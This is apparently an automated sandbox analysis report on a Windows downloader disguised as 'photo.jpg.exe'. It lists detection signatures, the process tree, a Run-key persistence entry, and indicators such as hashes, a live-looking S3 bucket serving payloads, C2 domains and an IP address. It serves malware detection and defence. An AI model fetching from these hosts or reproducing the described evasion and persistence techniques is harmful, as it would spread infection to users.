
Windows Analysis Report
photo.jpg.exe

Overview

General Information

Sample name: photo.jpg.exe
(renamed file extension from pif to exe)
Original sample name: photo.jpg.pif
Analysis ID: 1654778
MD5: a5fb35b15c22b46a62905bf7a9f492bf
SHA1: 216a53be8dab4818a90044e5940cc3f13e8ab604
SHA256: 5727cc8ef222a2a0f24ed139bbd4de56b0f09806561074d40ed4d62e40df1ad5

Detection

Score: 80
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification

Classification

[Classification chart: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; legend: clean, suspicious, malicious]
  • System is w10x64
  • photo.jpg.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\photo.jpg.exe" MD5: A5FB35B15C22B46A62905BF7A9F492BF)
    • TASLogin.exe (PID: 7304 cmdline: "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe" MD5: 7CA41E122724C2D808BF73B7A5129365)
      • WerFault.exe (PID: 7432 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1600 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1656 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • TASLogin.exe (PID: 7528 cmdline: "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe" MD5: 7CA41E122724C2D808BF73B7A5129365)
    • WerFault.exe (PID: 7612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 1376 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7660 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 1384 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • TASLogin.exe (PID: 7700 cmdline: "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe" MD5: 7CA41E122724C2D808BF73B7A5129365)
    • WerFault.exe (PID: 7768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 1460 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7804 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 1468 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe, ProcessId: 7304, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TASLogin
No Suricata rule has matched

AV Detection

Source: photo.jpg.exe; Avira: detected
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\commonbase.dll; ReversingLabs: Detection: 39%
Source: photo.jpg.exe; Virustotal: Detection: 34%
Source: Submitted Sample; Neural Call Log Analysis: 91.5%
Source: unknown; HTTPS traffic detected: 3.5.150.219:443 -> 192.168.2.9:49684 version: TLS 1.2
Source: photo.jpg.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Administrator\Desktop\WindowsFormsApp20250321\WindowsFormsApp\WindowsFormsApp\obj\Release\WindowsFormsApp.pdb source: photo.jpg.exe
Source: Binary string: D:\Workspace\p-2ed35f15174943f6b676502b51f53d81\Output\TASLogin.pdb source: TASLogin.exe, TASLogin.exe.0.dr
Source: Binary string: D:\Workspace\p-2ed35f15174943f6b676502b51f53d81\Output\TASLogin.pdbTT source: TASLogin.exe, TASLogin.exe.0.dr
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; File opened: C:\Users\user\AppData
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; File opened: C:\Users\user
Source: global traffic; TCP traffic: 192.168.2.9:49709 -> 13.208.251.115:3158
Source: global traffic; HTTP traffic detected: GET /uu.txt HTTP/1.1; Host: imagesyd.s3.ap-southeast-1.amazonaws.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /TASLoginBase.dll HTTP/1.1; Range: bytes=0-; Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global traffic; HTTP traffic detected: GET /commonbase.dll HTTP/1.1; Range: bytes=0-; Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global traffic; HTTP traffic detected: GET /TASLogin.edskv HTTP/1.1; Range: bytes=0-; Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global traffic; HTTP traffic detected: GET /TASLogin.txt HTTP/1.1; Range: bytes=0-; Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global traffic; HTTP traffic detected: GET /image.jpg HTTP/1.1; Range: bytes=0-; Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global traffic; HTTP traffic detected: GET /TASLogin.exe HTTP/1.1; Range: bytes=0-; Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global traffic; DNS traffic detected: DNS query: u.arpuu.com
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: TASLogin.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLoginBase.dll.0.dr; String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: photo.jpg.exe, TASLogin.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: TASLogin.exe.0.dr, TASLoginBase.dll.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: TASLogin.exe.0.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: photo.jpg.exe; String found in binary or memory: http://imagesyd.s3.ap-southeast-1.amazonaws.com
Source: photo.jpg.exe; String found in binary or memory: http://imagesyd.s3.ap-southeast-1.amazonaws.comd
Source: photo.jpg.exe; String found in binary or memory: http://imagesyd.s3.ap-southeast-1.amazonaws.comp
Source: photo.jpg.exe, TASLogin.exe.0.dr; String found in binary or memory: http://ocsp.digicert.com0
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.dr; String found in binary or memory: http://ocsp.digicert.com0A
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.dr; String found in binary or memory: http://ocsp.digicert.com0C
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.dr; String found in binary or memory: http://ocsp.digicert.com0X
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLoginBase.dll.0.dr; String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: TASLogin.exe; String found in binary or memory: http://okmou.com/comments/add
Source: photo.jpg.exe; String found in binary or memory: http://s3-r-w.ap-southeast-1.amazonaws.com
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002774000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002942000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002735000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000298D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000294D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000290D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002810000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000027F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-r-w.ap-southeast-1.amazonaws.comd
Source: photo.jpg.exe, 00000000.00000002.1325579396.000000000271F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, TASLogin.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: photo.jpg.exe, 00000000.00000002.1325579396.000000000271F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000275E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.edskv
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.edskvd
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002A1D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000275E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exe
Source: photo.jpg.exe, 00000000.00000002.1325579396.000000000290D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exed
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exep
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exex
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000275E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.txt
Source: photo.jpg.exe, 00000000.00000002.1325579396.000000000290D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.txtd
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000275E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLoginBase.dll
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLoginBase.dlld
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000275E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/commonbase.dll
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000027CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/commonbase.dlld
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000275E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/image.jpg
Source: photo.jpg.exe, 00000000.00000002.1325579396.000000000290D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/image.jpgd
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/image.jpgt-Nr
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000026D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/uu.txt
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.comD
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLoginBase.dll.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: unknownHTTPS traffic detected: 3.5.150.219:443 -> 192.168.2.9:49684 version: TLS 1.2

System Summary

Source: TASLoginBase.dll.0.drStatic PE information: section name: .]<_
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1600
Source: commonbase.dll.0.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: commonbase.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: photo.jpg.exe, 00000000.00000000.897773091.0000000000288000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSIH ClientjJ vs photo.jpg.exe
Source: photo.jpg.exe, 00000000.00000002.1323953162.000000000090E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs photo.jpg.exe
Source: photo.jpg.exeBinary or memory string: OriginalFilenameSIH ClientjJ vs photo.jpg.exe
Source: TASLogin.exe.0.drStatic PE information: Section: .ace ZLIB complexity 1.000368212090164
Source: TASLogin.exe.0.drStatic PE information: Section: .tvm0 ZLIB complexity 0.9970918543198529
Source: photo.jpg.exe, DownloaderApp.csBase64 encoded string: 'YUhSMGNITTZMeTlwYldGblpYTjVaQzV6TXk1aGNDMXpiM1YwYUdWaGMzUXRNUzVoYldGNmIyNWhkM011WTI5dEwzVjFMblI0ZEE9PQ=='
Source: classification engineClassification label: mal80.evad.winEXE@11/8@7/7
Source: C:\Users\user\Desktop\photo.jpg.exeFile created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042
Source: C:\Users\user\Desktop\photo.jpg.exeMutant created: NULL
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeMutant created: \Sessions\1\BaseNamedObjects\hkuewdbghrgxv
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\496ac3a0-389f-4b5d-aefb-5ce70a082f5f
Source: photo.jpg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: photo.jpg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\photo.jpg.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\photo.jpg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: photo.jpg.exeVirustotal: Detection: 34%
Source: unknownProcess created: C:\Users\user\Desktop\photo.jpg.exe "C:\Users\user\Desktop\photo.jpg.exe"
Source: C:\Users\user\Desktop\photo.jpg.exeProcess created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe"
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1600
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1656
Source: unknownProcess created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe"
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 1376
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 1384
Source: unknownProcess created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe"
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 1460
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 1468
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: advpack.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: hjykaiv2.lnk.14.dr; LNK file: ..\..\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: photo.jpg.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: photo.jpg.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: photo.jpg.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Administrator\Desktop\WindowsFormsApp20250321\WindowsFormsApp\WindowsFormsApp\obj\Release\WindowsFormsApp.pdb source: photo.jpg.exe
Source: Binary string: D:\Workspace\p-2ed35f15174943f6b676502b51f53d81\Output\TASLogin.pdb source: TASLogin.exe, 0000000E.00000000.1321310909.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe, 00000014.00000000.1425365427.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe, 00000019.00000000.1510046802.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe.0.dr
